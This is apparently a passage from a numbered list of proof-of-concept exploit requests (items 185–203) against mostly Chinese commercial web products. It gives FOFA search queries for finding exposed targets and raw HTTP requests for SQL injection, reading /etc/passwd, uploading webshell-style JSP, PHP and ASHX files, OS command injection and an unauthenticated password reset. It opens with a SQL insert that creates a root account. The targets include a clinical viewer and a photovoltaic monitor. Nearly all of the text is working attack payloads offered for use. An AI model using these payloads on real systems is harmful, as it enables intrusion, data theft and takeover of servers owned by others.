Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技 (LANWON) clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
Request /servlet/uploadAttachmentServlet; if it returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (FOUNDER) omnimedia news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values in the following request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--